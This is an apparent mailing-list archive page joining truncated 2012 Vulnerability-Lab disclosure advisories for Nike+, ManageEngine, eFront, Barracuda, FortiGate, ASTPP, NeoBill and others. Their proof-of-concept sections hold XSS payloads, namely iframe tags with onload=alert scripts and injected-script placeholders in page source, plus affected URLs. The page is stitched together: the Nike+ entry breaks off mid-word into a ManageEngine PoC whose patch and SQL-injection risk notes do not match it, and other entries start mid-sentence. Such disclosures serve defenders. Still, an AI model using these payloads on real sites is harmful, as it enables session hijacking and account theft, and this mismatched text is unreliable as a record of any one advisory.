been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

Nike+ Panel Mobile App - Multiple Web Vulnerabilities

Title:
==
Nike+ Panel  Mobile App - Multiple Web Vulnerabilities


Date:
=
2012-08-01


References:
===
http://www.vulnerability-lab.com/get_content.php?id=663


VL-ID:
=
663


Common Vulnerability Scoring System:

3.5


Introduction:
=
Das Nike+ FuelBand zeichnet deine täglichen Aktivitäten über einen im Sport 
getesteten dreiachsigen Beschleunigungsmesser auf. 
Dann rechnet es jede Bewegung in NikeFuel um. Das Nike+ FuelBand zeichnet 
Laufen, Gehen, Tanzen, Basketball und die Ergebnisse 
einer Vielzahl alltäglicher Aktivitäten auf. Außerdem kannst du die Ergebnisse 
mit einer motivierenden, mobilen Website 
synchronisieren. Also: Anlegen und loslegen. Wie aktiv möchtest du sein? Leg 
dein Tagesziel fest. Das Nike+ FuelBand misst deinen 
Fortschritt und zeigt ihn dir im Verlauf des Tages mit einer Farbanzeige von 
rot bis grün an. Wenn du in den grünen Bereich kommst, 
hast du dein Ziel erreicht. Mach aus jedem Tag ein neues Spiel. Brich Rekorde, 
erreiche neue Meilensteine und schalte besondere 
Errungenschaften frei. Reite auf einer Erfolgswelle und probiere, wie viele 
Tage in Folge du dein Tagesziel erreichst.

(Copy of the Homepage: http://nikeplus.nike.com/plus/ )

A Nike+ FuelBand is required to use this app. You must have iOS 5.0 or above 
installed to use the Nike+ FuelBand app.

Description

A Nike+ FuelBand is required to use this app. You must have iOS 5.0 or above 
installed to use the Nike+ FuelBand app.
Nike+ FuelBand measures your everyday activity and turns it into NikeFuel. It 
also tracks each step and calorie burned. 
The App talks to your Nike+ FuelBand, allowing you to see your progress on your 
mobile device and get the motivation 
you need to get moving.

• Sync wirelessly, set your Daily Goal directly from the App and decide how 
much NikeFuel you want to earn that day.
• Sync your Nike+ FuelBand throughout the day to track your NikeFuel and try to 
hit your Daily Goal.
• See your daily activity breakdown and view your progress by week, month, 
oryear.
• View your achievement celebrations and save your badges in your trophycase. 
Bragging optional.
• Connect, compare and compete with your Facebook friends. See your daily and 
weekly NikeFuel totals on a social leaderboard.
• Keep track of your streaks. See how many days in a row you can reach 
yourDaily Goal.
• Keep track of your personal bests. Set your records and try to break them.
• Get notified every time you earn a trophy, beat a record, or reach a 
milestone.
• Manage your Nike+ profile and settings on the go.
• Write about your day and keep a personal record of how you felt. See 
whatmakes you tick.
• Share your NikeFuel and achievements with friends on Facebook and Twitter. 
Get cheered on and stay motivated.
• Stay connected to the rest of the Nike+ community.
• The app automatically sends all your information to your Nike+ profile online.
• Nike+ FuelBand Device required.

(Copy of the Homepage: 
http://itunes.apple.com/de/app/nike+-fuelband/id493325070?mt=8# )


Abstract:
=
Vulnerability-Lab Team discovered multiple Web Vulnerabilities in the Nike+ 
Control Panel  fuelband mobile web application.


Report-Timeline:

2012-04-06: Researcher Notification  Coordination
2012-05-28: Vendor Notification 1
2012-06-09: Vendor Notification 2
2012-07-22: Vendor Notification 3
2012-08-01: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

Multiple persistent input validation vulnerabilities are detected in the Nike+ 
Control Panel  fuelband mobile web application.
The bug allows an attackers to implement/inject malicious script code on the 
application side (persistent). 

The first persistent vulnerability is located in the profile username input 
with the bound vulnerable name normal_font listing.
The persistent code get executed out of the mobile application username listing 
 nike+ index panel username profile listing.

The secound persistent vulnerability is located in the facebook friends module 
 the bound vulnerable facebook friend name listing.
The persistent code get executed out of the friends (management) when 
processing to add a user with malicious string in the facebook name.

The third vulnerability is located in the nike+ search module for members and 
the bound vulnerable alt_header_font title listing.
The 3rd vulnerability is located on client side of the application and gets 
executed when a register malicious username will be searched.
By injecting any own script code directly without the existing user the code 
will be executed on client side of the search module.

Successful exploitation of the vulnerability can lead to persistent session 
hijacking (manager/admin) or stable (persistent) 
context manipulation in mobile apps or panels via sync. Exploitation requires 
low user inter

ManageEngine OpStor v7.4 - Multiple Web Vulnerabilities

PoC:
http://opstor.127.0.0.1:1338/availability730.do
?days=iframe src=http://www.vuln-lab.com onload=alert(XSS)/iframe
name=iframe src=http://www.vuln-lab.com onload=alert(XSS)/iframe


Solution:
=
2012-08-07: Vendor Fix/Patch

Manually steps to apply the patch/fix:

1. Download the patch and place it in AppManager_home directory. 
(AppManager_Home is the directory 
in which Applications Manager is installed, default location is C://Program 
Files (x86)/ManageEngine/AppManager10)

2. Extract the patch under AppManager_home. If prompted for a file replace, 
replace the existing file with the 
file from the Patch.  (or you can extract the zip file and copy the server.xml 
from the zip to the location as shown 
in the below structure).

3. After extracting ensure you have the Server.xml file as per the below 
provided structure:

 AppManager_home
|
.working
...apache
...tomcat
...conf
...backup
.server.xml 


4. Shut Down Applications Manager Software
5. Rename Logs folder path or variable
6. Start Applications Manager after the change
7. Done!


PATCH DOWNLOAD: 
http://bonitas.zohocorp.com/customer_uploads/2012_8_16_10_12_39_BadInput_10600.zip
 


Risk:
=
1.1
The security risk of the  blind SQL injection  vulnerability is estimated as 
critical.

1.2
The security risk of the persistent input validation vulnerability is estimated 
as medium(+).

1.3
The security risk of the client side cross site vulnerabilities are estimated 
as low(+).


Credits:

Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) 
[st...@vulnerability-lab.com] [iel-sayed.blogspot.com]


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

eFront Educational v3.6.11 - Multiple Web Vulnerabilities

2012-09-05 Thread Vulnerability Lab

Title:
==
eFront Educational v3.6.11 - Multiple Web Vulnerabilities


Date:
=
2012-08-03


References:
===
http://www.vulnerability-lab.com/get_content.php?id=666


VL-ID:
=
666


Common Vulnerability Scoring System:

3.5


Introduction:
=
Tailored with larger organizations in mind, eFront Educational offers solutions 
for the management of companies most 
valued asset - the people. Based on a coherent approach to human capital 
management which keeps the workforce actively 
engaged, the eFront Educational platform offers the means of aligning learning 
programs with business goals to cultivate 
employee skills and knowledge associated with business performance. eFront 
Enterprise builds on top of eFront Educational.

(Copy of the Vendor Homepage: http://efrontlearning.net/product/ )


Abstract:
=
A Vulnerability Laboratory Researcher of the Vulnerability Laboratory Team 
discovered multiple web vulnerabilties in eFront v3.6.11 Educational.


Report-Timeline:

2011-08-03: Public Disclosure


Status:

Published


Affected Products:
==
eFront
Product: Educational v3.6.11


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

Multiple persistent input validation vulnerabilities are detected in the eFront 
Educational v3.6.11 Content Management System.
The vulnerabilities allow remote attackers to implement/inject malicious script 
code on the application side (persistent).
The first vulnerability is located in the profile module with the bound 
vulnerable firstname  lastname parameters. The bug 
allows a low privileged student account to exploit higher privileged trainer or 
administrator user accounts via registration.
Exploitation of the first vulnerability requires low privileged student 
elearning application user account.
The secound vulnerability is located in the Messages - New Folder Name module 
with the bound vulnerable folder listing.
Exploitation of the secound vulnerability requires low privileged student user 
account  is only local exploitable.
Successful exploitation of the vulnerabilities can lead to persistent session 
hijacking (manager/admin) or stable 
(persistent) context manipulation. 


Vulnerable Module(s):
[+] Profile - User (Administrator User Listing)
[+] Messages


Vulnerable Parameters(s):
[+] Firstname  Lastname
[+] Foldername


Proof of Concept:
=
The persistent input validation vulnerabilities can be exploited by remote 
attacker with a privileged student account.
For demonstration or reproduce ...


Review: Administrator - User Listing (Firstname  Lastname)

tr id=row_student class=oddRowColor 
tda 
href=http://efront.127.0.0.1:137/educational/www/administrator.php?ctg=personaluser=student;
 
class=editLinkspan id=column_studentiframe 
src=administrator.php-[PERSISTENT INJECTED SCRIPT CODE!])' = 
d.= (student)= span=/a/td

Affected URL(s):
http://efront.127.0.0.1:137/educational/www/student.php?ctg=personaluser=studentop=profile
http://efront.127.0.0.1:137/educational/www/administrator.php?ctg=users
http://efront.127.0.0.1:137/educational/www/administrator.php?ctg=personaluser=studentop=profile


Review: Messages - Add New Folder Name - Listing

td
span class=counter4./span
a href=http://efront.127.0.0.1:137/educational/www/student.php?ctg=messages;
folder=10iframe src=student-[PERSISTENT INJECTED SCRIPT CODE!])'  (0= 
messages,= 0kb)= a=
/td
td


Risk:
=
The security risk of the persistent web vulnerabilities are estimated as 
high(-).


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section

eFront Enterprise v3.6.11 - Multiple Web Vulnerabilities

2012-09-05 Thread Vulnerability Lab

%2Fwww
%2Fvhosts%2Fdemo%2Fenterprise%2Fupload%2Ftrainee%2Fmodule_hcd%2Fpublic%2F%22%3E%3C[PERSISTENT
 INJECTED SCRIPT CODE!]');
iframe src=student-[PERSISTENT INJECTED SCRIPT CODE!])' = a=span
id = 
edit_%2Fvar%2Fwww%2Fvhosts%2Fdemo%2Fenterprise%2Fupload%2Ftrainee%2Fmodule_hcd%2Fpublic%2F%22%3E%3C[PERSISTENT
 INJECTED SCRIPT CODE!]
 style = display:noneinput type = text value = 
[PERSISTENT INJECTED SCRIPT CODE!])  onkeypress = if 
(event.which == 13 || event.keyCode == 13) 
{Element.extend(this).next().down().onclick(); return 
false;}/ a href = javascript:void(0)img id =
editImage_%2Fvar%2Fwww%2Fvhosts%2Fdemo%2Fenterprise%2Fupload%2Ftrainee%2Fmodule_hcd%2Fpublic%2F%22%3E%3C[PERSISTENT
 INJECTED SCRIPT CODE!]src
 = 'themes/default/images/others/transparent.gif' class = 'sprite16 
sprite16-success' style = vertical-align:middle onclick = 
editFile(this, 
$('span_%2Fvar%2Fwww%2Fvhosts%2Fdemo%2Fenterprise%2Fupload%2Ftrainee%2Fmodule_hcd%2Fpublic%[PERSISTENT
 INJECTED SCRIPT CODE!]').innerHTML,
 Element.extend(this).up().previous().value, 
'directory','\[PERSISTENT INJECTED SCRIPT CODE!]) ') border =
0/a/span/tdtd/td
 td27 Jul 2012, 23:38/td

URL: 
http://efront.127.0.0.1:1339/enterprise/www/student.php?ctg=personaluser=traineeop=files



Review: PANEL Index - Write something about yourself (Only local exploitable!)

td
span class=leftOptionTrainee D. (trainee) /span
span style= id=statusText onclick=javascript:showStatusChange()
iiframe src=student3-[PERSISTENT INJECTED SCRIPT CODE!])' = 
i=/iframe/i/span
input class=inputText id=inputStatusText style=display: none; value=
[PERSISTENT INJECTED SCRIPT CODE!];)  onblur=changeStatus()
img style=visibility: visible; progressimage=anonymous_element_16 
id=statusTextProgressImg 
src=student3-Dateien/transparent.gif class=ajaxHandle sprite32 
sprite32-edit alt=Click to change status 
title=Click to change status onclick=javascript:showStatusChange()
/td

URL: 
http://efront.127.0.0.1:1339/enterprise/www/student.php?ctg=personaluser=traineeop=dashboard


Risk:
=
The security risk of the persistent web vulnerabilities are estimated as 
high(-).


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory

-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

Barracuda Web Filter 910 5.0.015 - Multiple Vulnerabilities

2012-09-05 Thread Vulnerability Lab

Title:
==
Barracuda Web Filter 910 5.0.015 - Multiple Vulnerabilities


Date:
=
2012-08-02


References:
===
http://www.vulnerability-lab.com/get_content.php?id=570

Barracuda Networks Security ID: BNSEC-279/BNYF-5533


VL-ID:
=
570


Common Vulnerability Scoring System:

4.5


Introduction:
=
The Barracuda Web Filter is an integrated content filtering, application 
blocking and malware protection 
solution that is powerful, easy to use and affordable for businesses of all 
sizes. It enforces Internet 
usage policies by blocking access to Web sites and Internet applications that 
are not related to business, 
and it easily and completely eliminates spyware and other forms of malware from 
your organization. No more 
productivity loss trying to repair computers or make computers usable again.

Blocks access to Web sites based on domain, URL pattern, or content category
Blocks downloads based on file type
Blocks applications that access the Internet, including IM, music services, and 
software update utilities
Integrates with  safe search  filters built into popular images search engines
Provides integrated gateway and desktop spyware protection
Uses Barracuda Web Security Agents compatible with Windows PC’s and Macs to 
enforce Internet policies on off-network computers

The Barracuda Web Filter combines preventative, reactive, and proactive 
measures to form a complete Web 
filtering solution. Designed for the enterprise, the Barracuda Web Filter 
enables you to set up custom policies 
for particular users and groups across customizable time ranges. The Barracuda 
Web Filter integrates with popular 
LDAP directory servers, such as Microsoft Active Directory, for both 
authentication and group membership 
information on which to apply custom policies. Sample uses of group policies 
include:

Restricting access to job board Web sites to only the Human Resources group
Defining separate policies for teachers and students at a school
Enabling compliance officers unrestricted access to the Web for investigation
Providing external instant messaging (e.g., AIM) access only to specific users 
or groups
Restricting personal Web browsing to non-working hours

For organizations that do not utilize directory servers, policies can be 
defined for unauthenticated users as a whole, 
locally defined users and groups, or network IP address ranges.

(Copy of the Vendor Homepage: 
http://www.barracudanetworks.com/ns/products/web-filter-overview.php )


Abstract:
=
The Vulnerability Lab Research Team discovered multiple Web Vulnerabilities in 
Barracudas Web Filter Application v5.0.0.015 Appliance Model 910.


Report-Timeline:

2012-05-01: Researcher Notification  Coordination
2012-05-08: Vendor Notification
2012-06-13: Vendor Response/Feedback
2012-07-25: Vendor Fix/Patch
2012-08-02: Public or Non-Public Disclosure


Status:

Published


Affected Products:
==
Barracuda Networks
Product: Barracuda Web Filter Appliance 910 v5.0.0.015


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple persistent input validation vulnerabilities are detected in the 
Barracudas Web Filter Application v5.0.0.015 Appliance Model 910. 
The bugs allow remote attackers to implement/inject malicious script code on 
the application side (persistent). Successful exploitation 
of the vulnerability can lead to session hijacking (manager/admin) or stable 
(persistent) context manipulation. Exploitation requires 
low user inter action. The vulnerability is located in the NTLM Edit - Host  
Domain Name which is bound to the affected vulnerable 
Existing Authentication Services listing.  Another vulnerability is located on 
the upload key tab in combination with the 
unsanitized short domain name input field + output listing.


Vulnerable Module(s):
[+] Authentification  New Authentication 
Service
   [-] NTLM - Server Hostname  Domain Name - 
Existing Authentication Services

[+] Authentification  Kerberos  Advanced 
Settings
   [-] Upload Key Tab File in combination with 
alternative Short Domain Name

Picture(s):
../1.png
../2.png


Proof of Concept:
=
The persistent web vulnerabilities can be exploited by remote attackers with 
high[-](medium+) user inter action or via 
local low privileged user account with low require user inter action. For 
demonstration or reproduce ...

Review: NTLM Edit  Listing

td colspan=2 style= valign=top width=285input autocomplete=off 
id=UPDATE_ntlm_server_hostname:
md5UBwQ8iCjrc1egk1wTV8SEg 
name=UPDATE_ntlm_server_hostname:md5UBwQ8iCjrc1egk1wTV8SEg size=30 value=
[PERSISTENT SCRIPT CODE EXECUTION!]  type=textbrdiv nowrap

Knowledge Base EE v4.62.0 - SQL Injection Vulnerability

2012-09-13 Thread Vulnerability Lab

. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities

2012-09-13 Thread Vulnerability Lab

Title:
==
Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities


Date:
=
2012-09-06


References:
===
http://www.vulnerability-lab.com/get_content.php?id=557


VL-ID:
=
557


Common Vulnerability Scoring System:

5


Introduction:
=
The FortiGate series of multi-threat security systems detect and eliminate the 
most damaging, content-based threats from email 
and Web traffic such as viruses, worms, intrusions, inappropriate Web content 
and more in real time - without degrading 
network performance.

Ranging from the FortiGate-30 series for small offices to the FortiGate-5000 
series for large enterprises, service providers and 
carriers, the FortiGate line combines the FortiOS™ security operating system 
with FortiASIC processors and other hardware to provide 
a comprehensive and high-performance array of security and networking functions 
including:

* Firewall, VPN, and Traffic Shaping
* Intrusion Prevention System (IPS)
* Antivirus/Antispyware/Antimalware
* Web Filtering
* Antispam
* Application Control (e.g., IM and P2P)
* VoIP Support (H.323. and SCCP)
* Layer 2/3 routing
* Multiple WAN interface options

FortiGate appliances provide cost-effective, comprehensive protection against 
network, content, and application-level threats - including 
complex attacks favored by cybercriminals - without degrading network 
availability and uptime. FortiGate platforms incorporate sophisticated 
networking features, such as high availability (active/active, active/passive) 
for maximum network uptime, and virtual domain (VDOM) 
capabilities to separate various networks requiring different security policies.

Since 2009 Fortigate appliance series got certified by the U.S. Army and is now 
listed in the 
Information Assurance Approved Products List (IA APL). The military provides 
high security 
standards to secure outdoor camps, air base, offices with fortigate hardware.

(Copy from the Vendor Homepage: http://www.fortinet.com/products/fortigate )


Abstract:
=
Vulnerability-Lab Research Team discovered multiple persistent Web 
Vulnerabilities in the FortiGate UTM Appliance Application.


Report-Timeline:

2012-05-06: Researcher Notification  Coordination
2012-05-10: Vendor Notification
2012-06-11: Vendor Response/Feedback
2012-08-25: Vendor Fix/Patch ( Fixed in FortiOS v4.3.8 B0537  Fixed in 
FortiOS v5.0  )
2012-09-06: Public or Non-Public Disclosure


Status:

Published


Affected Products:
==
Fortigate
Product: UTM Appliance Application vFortiGate-5000 Series;FortiGate-3950 
Series;FortiGate-3810A;


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

Multiple input validation vulnerabilities(persistent) are detected in the 
FortiGate UTM Appliance Application. Remote attackers 
 low privileged user accounts can inject (persistent) own malicious script 
code to manipulate specific customer/admin requests. 
The vulnerability allows an local low privileged attacker to  manipulate the 
appliance(application) via persistent script code 
inject. The vulnerability is locaed in the Add or Tags module category listing 
with the bound vulnerable applied tags  tags display parameters.
Successful exploitation results in content module request manipulation, 
execution of persistent malicious script code, session 
hijacking, account steal  persistent phishing.

Vulnerable Module(s): (Persistent)
[+] Tags - Applied tags 
[+] Add - Tags Display


Interface - UTM WAF Web Application [Appliance]
FortiGate-5000 Series;FortiGate-3950 
Series;FortiGate-3810A;FortiGate-3600A;FortiGate-3016B;FortiGate-1240B
FortiGate-800;FortiGate-620B;FortiGate-311B;FortiGate-310B;FortiGate-300A;FortiGate-224B;FortiGate-200B
 Series


Proof of Concept:
=
The persistent vulnerabilities can be exploited by remote attackers with low 
required user inter action or low 
privileged user account. For demonstration or reproduce  ...


Code Review:Tags - Applied tags [Box]  Listing
URL:
http://appliance.127.0.0.1:1337/firewall/policy/policy6?expanded=#

name=``addr_dlg`` action=``/firewall/address/add`` onsubmit=``if 
(!fwad_form_check('Please choose one address/group.',
'Please choose one interface to connect.')) return false; if 
(document.forms[0].submitFlag) return false; document.forms[0].
submitFlag = true;``
tabletbodytr
td align=``left`` width=``150``nobrAddress Name/nobr/td
td align=``left``input 
name=``name`` size=``64`` maxlength=``63`` value=``all`` type=``text``
/td
/tr
tr
tdColor/td
tdspan colorclassprefix=``addr_ipv6_
`` class=``icon_fw addr_ipv6_13`` id=``addressIcon``/span a href=``#`` 
id=``addressColor`` cscolorvalue=``0``[Change]input value=``13`` 
name=``csColor1`` type

ASTPP VoIP Billing (4cf207a) - Multiple Web Vulnerabilities

2012-09-17 Thread Vulnerability Lab

;div style=text-align: center; width: 
70px; white-space: normal;daily/div/div/tdtd align=centerdiv 
style=text-align: center; width: 50px; 
white-space: normal;div style=text-align: center; width: 50px; white-space: 
normal;No/div/div/tdtd align=center
div style=text-align: center; width: 90px; white-space: normal;div 
style=text-align: center; width: 90px; white-space: 
normal;Customer/div/div/tdtd align=centerdiv style=text-align: 
center; width: 90px; white-space: normal;
div style=text-align: center; width: 90px; white-space: 
normal;Active/div/div/tdtd align=centerdiv style=text-align: 
center; width: 120px; white-space: normal;div style=text-align: center; 
width: 120px; white-space: 
normal;a 
href=http://demo.astpp.org/accounts/payment_process/asdsadfas%20;[PERSISTENT 
INJECTED SCRIPT CODE]= = 
class=icon 
style=text-decoration:none;background-image:url(/images/payment.png); 
rel=facebox title=ProcessPayment
amp;nbsp;lt;/agt;lt;a 
href=http://demo.astpp.org/accounts/account_detail/asdsadfas 


Review: DIDs

li
label class=descAccess Number:/label
input name=access_number class=text field medium size=20 
readonly=readonly 
type=text[PERSISTENT INJECTED SCRIPT CODE]@108.163.242.106=/iframe
  input name=id value=11 type=hidden
  /li
li
label class=descNote:/label
input name=note class=text field medium size=10 
type=text[PERSISTENT INJECTED SCRIPT CODE])' =/iframe
/li
li
  label class=descStatus:/label
  select name=status class=select field medium
option value=0 selected=selectedACTIVE/option
option value=1INACTIVE/option
  /select


Review: Trunks

td align=centerdiv style=text-align: center; width: 329px; white-space: 
normal;
a href=http://demo.astpp.org/lcr/trunks/edit/;[PERSISTENT INJECTED SCRIPT 
CODE]' class=icon style=
text-decoration:none;background-image:url(/images/page_edit.png); 
rel=facebox title=Update /aa
 href=/lcr/trunks/delete/iframe src=a onload=alert(/
 class=icon 
style=text-decoration:none;background-image:url(/images/delete.png); 
title=Delete onClick=return 
get_alert_msg(); /a/iframe/a/div/td/tr/tbody/table
div style=display: none; class=iDiv/div/div


Review: Taxes

fieldset style=width:585px;
legendspan style=font-size:14px; font-weight:bold; 
color:#000;Taxes Information/span/legend
li
label class=descPriority:/labelinput class=text field 
medium value=0 name=taxes_priority size=20 type=text
/li
li
label class=descAmount:/labelinput class=text field medium 
value=0. name=taxes_amount size=20 type=text
/li
li
label class=descRate(%):/label
input class=text field medium value=0. name=taxes_rate 
size=8 type=text
/li
li
label class=descDescription:/label
input class=text field medium type=text[PERSISTENT INJECTED 
SCRIPT CODE])' = name=taxes_description size=8/iframe
/li
/fieldset


Risk:
=
The security risk of the persistent web vulnerabilities are estimated as 
high(-).


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form

NeoBill CMS v0.8 Alpha - Multiple Web Vulnerabilities

2012-09-17 Thread Vulnerability Lab

://vuln-lab.com%20onload=alert%28%22VLABS%22%29%20%3C
neobill.127.0.0.1:1339/neobill/manager/manager_content.php?page=view_log_%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VLABS%22%29%20%3Clog=1

Search:
